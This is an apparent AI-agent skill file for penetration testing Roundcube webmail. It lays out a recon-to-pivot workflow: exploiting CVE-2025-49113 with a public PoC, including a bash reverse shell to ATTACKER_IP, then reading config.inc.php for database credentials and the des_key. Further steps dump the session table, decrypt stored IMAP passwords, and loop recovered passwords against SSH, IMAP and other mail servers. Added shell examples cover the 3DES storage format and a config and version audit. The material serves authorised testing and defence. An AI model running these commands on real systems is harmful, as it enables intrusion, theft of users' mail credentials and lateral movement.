Hacktricks-skills roundcube-pentest

Exploit Roundcube webmail vulnerabilities and recover credentials. Use this skill whenever you need to test Roundcube installations, exploit CVE-2025-49113 authenticated RCE, decrypt Roundcube session data, or recover IMAP passwords from compromised Roundcube servers. Trigger this for any Roundcube-related pentesting, webmail exploitation, or post-exploitation credential recovery tasks.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/network-services-pentesting/pentesting-web/roundcube/SKILL.MD
source content

Roundcube Pentesting Skill

A comprehensive skill for exploiting Roundcube webmail vulnerabilities and recovering credentials during penetration testing engagements.

When to Use This Skill

Use this skill when:

  • You've identified a Roundcube webmail installation during reconnaissance
  • You have valid Roundcube credentials and need to escalate to RCE
  • You've gained access to a Roundcube server and need to recover IMAP passwords
  • You're testing for CVE-2025-49113 (PHP object deserialization RCE)
  • You need to decrypt Roundcube session data for lateral movement

Quick Start

1. Identify Roundcube Installation

# Check for Roundcube fingerprints in HTML source
curl -s http://mail.target.tld | grep -i rcversion

# Look for common Roundcube paths
httpx -u http://mail.target.tld -mc 200 -f roundcube

2. Exploit CVE-2025-49113 (Authenticated RCE)

Affected versions:

  • 1.6.x before 1.6.11
  • 1.5.x before 1.5.10

Requirements:

  • Valid Roundcube username and password
  • Accessible Roundcube web UI

Exploitation:

# Clone the public PoC
git clone https://github.com/hakaioffsec/CVE-2025-49113-exploit.git
cd CVE-2025-49113-exploit

# Basic command execution
php CVE-2025-49113.php http://mail.target.tld USERNAME PASSWORD "id"

# Blind RCE validation (timing-based)
time php CVE-2025-49113.php http://mail.target.tld USERNAME PASSWORD "sleep 5"

# Reverse shell
nc -nvlp 443
php CVE-2025-49113.php http://mail.target.tld USERNAME PASSWORD \
  "bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1'"

Notes:

  • Output is often blind; use sleep N to validate RCE
  • Shell typically runs as www-data
  • In containers, expect /.dockerenv and 172.17.0.0/16 networking

3. Recover IMAP Passwords from Sessions

Roundcube stores IMAP passwords encrypted with 3DES in the session database. With filesystem or DB access, you can recover plaintext passwords.

Step 1: Extract Configuration

# Read DB credentials and 3DES key
grep -E "(db_dsnw|des_key)" /var/www/html/roundcube/config/config.inc.php

# Typical output:
# $config['db_dsnw'] = 'mysql://roundcube:DB_PASS@localhost/roundcube';
# $config['des_key'] = 'rcmail-!24ByteDESkey*Str';

Step 2: Dump Session Data

# Connect to database
mysql -u roundcube -p roundcube

# Query sessions
SELECT id, created, changed, vars FROM session\G

# Or export to file
mysql -u roundcube -pDB_PASS roundcube -e "SELECT vars FROM session" > sessions.txt

Step 3: Decrypt Passwords

Option A: Use Roundcube's built-in decrypt script

cd /var/www/html/roundcube
./bin/decrypt.sh CIPHERTEXT_BASE64

Option B: Use the provided decryption script

# Decrypt a single session
python3 scripts/decrypt_roundcube_session.py \
  --des-key "rcmail-!24ByteDESkey*Str" \
  --ciphertext "BASE64_CIPHERTEXT"

# Batch decrypt all sessions from DB
python3 scripts/decrypt_roundcube_session.py \
  --des-key "rcmail-!24ByteDESkey*Str" \
  --db-dsn "mysql://roundcube:DB_PASS@localhost/roundcube" \
  --output decrypted_passwords.json

Option C: Manual extraction (quick check)

# Base64 decode and search for the password field. The vars column is a base64-encoded
# serialized PHP session, so this shows the field and its still-encrypted value (itself
# base64 of IV || 3DES-CBC ciphertext), confirming presence rather than yielding plaintext.
echo 'BASE64_FROM_VARS' | base64 -d | tr ';' '\n' | grep -i password
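The storage layout that all three decrypt options operate on, shown as an added example that is neither the skill's decrypt_roundcube_session.py nor Roundcube's bin/decrypt.sh: a constructed value is wrapped the way a session password is stored, Base64(IV(8B) || 3DES-CBC(plaintext)), and unwrapped again with openssl so the layering is visible. The function names rc_keyhex, rc_encrypt and rc_decrypt, the key, the plaintext and the use of DES-EDE3-CBC with PKCS#7 padding are assumptions made for this example.

```shell
#!/bin/sh
# Added example, not the skill's script and not Roundcube's own code.
# Round-trips a constructed value through Base64(IV || DES-EDE3-CBC(plaintext)).
# Assumptions: PKCS#7 padding, 24-byte key; key and plaintext below are constructed.

# rc_keyhex KEY -> hex of the 24-byte des_key; fails for any other length
rc_keyhex() {
    [ "$(printf '%s' "$1" | wc -c | tr -d ' ')" -eq 24 ] || {
        echo "des_key must be exactly 24 bytes" >&2; return 1; }
    printf '%s' "$1" | od -An -tx1 | tr -d ' \n'
}

# rc_encrypt KEY PLAINTEXT -> base64(iv || ciphertext), the shape kept in session vars
rc_encrypt() {
    key_hex=$(rc_keyhex "$1") || return 1
    blob=$(mktemp)
    openssl rand 8 > "$blob"                                   # fresh 8-byte IV, stored in clear
    iv_hex=$(od -An -tx1 "$blob" | tr -d ' \n')
    printf '%s' "$2" | openssl enc -des-ede3-cbc -K "$key_hex" -iv "$iv_hex" >> "$blob"
    base64 < "$blob" | tr -d '\n'
    rm -f "$blob"
}

# rc_decrypt KEY BASE64 -> plaintext; same split that a decrypt helper has to do
rc_decrypt() {
    key_hex=$(rc_keyhex "$1") || return 1
    blob=$(mktemp)
    printf '%s' "$2" | base64 -d > "$blob"
    iv_hex=$(head -c 8 "$blob" | od -An -tx1 | tr -d ' \n')  # first 8 bytes are the IV
    tail -c +9 "$blob" | openssl enc -d -des-ede3-cbc -K "$key_hex" -iv "$iv_hex"
    rm -f "$blob"
}

# Constructed inputs (not a real key or credential)
DES_KEY='example!24ByteDESkey*Str'
SECRET='S3cretIMAPpass'

stored=$(rc_encrypt "$DES_KEY" "$SECRET")
echo "stored form : $stored"
echo "blob length : $(printf '%s' "$stored" | base64 -d | wc -c | tr -d ' ') bytes (8 IV + 16 ciphertext)"
echo "recovered   : $(rc_decrypt "$DES_KEY" "$stored")"
```

Two things the round trip makes concrete for anyone cleaning up after a compromise: the IV is public and des_key is the only secret, so a dumped session row plus the key yields the password with no further work, and rotating des_key afterwards only protects rows written from then on; the IMAP passwords in rows that were already copied need changing.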

Post-Exploitation Pivot

Credential Reuse Testing

# Test recovered IMAP credentials against SSH
# (read line by line so passwords containing spaces stay intact; -n stops ssh
#  from consuming the loop's stdin and the no-op command keeps it non-interactive)
while IFS= read -r cred; do
  sshpass -p "$cred" ssh -n user@target true && echo "SSH SUCCESS: $cred"
done < recovered_passwords.txt

# Test against other mail services
while IFS= read -r cred; do
  nmap -p 143,993 --script imap-brute,imap-ntlm-info -oN imap_test.txt \
    --script-args userdb=users.txt,passdb=<(echo "$cred") target
done < recovered_passwords.txt

Lateral Movement

# Check for other mailboxes in the same DB
mysql -u roundcube -p roundcube -e "SELECT username, email FROM users"

# Try recovered credentials on other Roundcube instances
# (-N drops the column header so "username" is not treated as an account)
mysql -N -u roundcube -p roundcube -e "SELECT username FROM users" |
while IFS= read -r user; do
  while IFS= read -r pass; do
    # Test against other mail servers
    curl -s -u "$user:$pass" http://other-mail.target.tld/ | grep -i "welcome"
  done < recovered_passwords.txt
done

Common Locations

  Resource                 Path
  Main config              /var/www/html/roundcube/config/config.inc.php
  Session decrypt helper   /var/www/html/roundcube/bin/decrypt.sh
  Database                 roundcube (MySQL)
  Session table            session
  Users table              users

Example Workflow

1. Recon: Identify Roundcube on mail.target.tld
2. Enumerate: Check version via HTML source (rcversion)
3. Exploit: Use CVE-2025-49113 with valid credentials → RCE
4. Pivot: Access filesystem, read config.inc.php
5. Extract: Dump session table from MySQL
6. Decrypt: Recover IMAP passwords using des_key
7. Expand: Test credentials against SSH, other mail services

Scripts Reference

decrypt_roundcube_session.py

Decrypts Roundcube session data using 3DES-CBC.

# Single ciphertext
python3 scripts/decrypt_roundcube_session.py \
  --des-key "YOUR_24_BYTE_KEY" \
  --ciphertext "BASE64_CIPHERTEXT"

# From database
python3 scripts/decrypt_roundcube_session.py \
  --des-key "YOUR_24_BYTE_KEY" \
  --db-dsn "mysql://user:pass@host/db" \
  --output results.json

# From file
python3 scripts/decrypt_roundcube_session.py \
  --des-key "YOUR_24_BYTE_KEY" \
  --input sessions.txt \
  --output results.json

recover_imap_passwords.sh

Automated password recovery from Roundcube installation.

# Auto-detect and recover
./scripts/recover_imap_passwords.sh /var/www/html/roundcube

# Specify paths
./scripts/recover_imap_passwords.sh \
  --config /path/to/config.inc.php \
  --output recovered_creds.txt

Security Notes

  • CVE-2025-49113 is authenticated RCE; you need valid credentials first
  • Output is often blind; use timing-based validation
  • The 3DES key must be exactly 24 bytes
  • Session data format: Base64(IV(8B) || 3DES-CBC(plaintext))
  • Older session rows may contain previous users' credentials
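An offline check for the two facts the notes state, the 24-byte des_key and the 1.6.11 / 1.5.10 fix versions listed under "Affected versions", as an added example that is not part of the skill's scripts. The config text is constructed, the placeholder key string is the one the page shows as typical output, and the function names config_get, des_key_findings, version_lt and cve_2025_49113_status are this example's own; the version compare is a plain dotted-version comparison and nothing here contacts a server.

```shell
#!/bin/sh
# Added example, not part of the skill. Audits a config.inc.php and a version
# string against what the page states: des_key must be 24 bytes, and
# CVE-2025-49113 is fixed in 1.6.11 / 1.5.10.

DEFAULT_DES_KEY='rcmail-!24ByteDESkey*Str'   # placeholder value shown on the page

# config_get FILE OPTION -> value of a simple quoted $config['OPTION'] = '...'; line
config_get() {
    sed -n "s/^[[:space:]]*\$config\[['\"]$2['\"]\][[:space:]]*=[[:space:]]*['\"]\(.*\)['\"][[:space:]]*;.*/\1/p" "$1" | head -n 1
}

# des_key_findings KEY -> one finding per line; prints nothing when the key is acceptable
des_key_findings() {
    len=$(printf '%s' "$1" | wc -c | tr -d ' ')
    [ "$len" -eq 24 ] || echo "des_key is $len bytes, must be exactly 24"
    [ "$1" != "$DEFAULT_DES_KEY" ] || echo "des_key is the stock placeholder; set a site-specific 24-byte key"
}

# version_lt A B -> exit 0 when dotted version A is lower than B
version_lt() {
    awk -v a="$1" -v b="$2" 'BEGIN {
        n = split(a, x, "."); m = split(b, y, "."); k = (n > m ? n : m)
        for (i = 1; i <= k; i++) {
            p = x[i] + 0; q = y[i] + 0
            if (p < q) exit 0
            if (p > q) exit 1
        }
        exit 1
    }'
}

# cve_2025_49113_status VERSION -> affected | fixed | unknown (branch not covered above)
cve_2025_49113_status() {
    case "$1" in
        1.6.*) fixed=1.6.11 ;;
        1.5.*) fixed=1.5.10 ;;
        *) echo unknown; return 0 ;;
    esac
    if version_lt "$1" "$fixed"; then echo affected; else echo fixed; fi
}

# Constructed config.inc.php sample (placeholder values, not a real deployment)
CONF=$(mktemp)
cat > "$CONF" <<'EOF'
<?php
$config['db_dsnw'] = 'mysql://roundcube:DB_PASS@localhost/roundcube';
$config['des_key'] = 'rcmail-!24ByteDESkey*Str';
EOF

key=$(config_get "$CONF" des_key)
echo "des_key in config: $key"
des_key_findings "$key"
for v in 1.6.10 1.6.11 1.5.9 1.4.15; do
    echo "$v: $(cve_2025_49113_status "$v")"
done
rm -f "$CONF"
```

Point it at a real config path and the rcversion found in step 1 instead of the constructed sample; an "affected" result together with a stock or short des_key is the combination the rest of the page walks through.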

References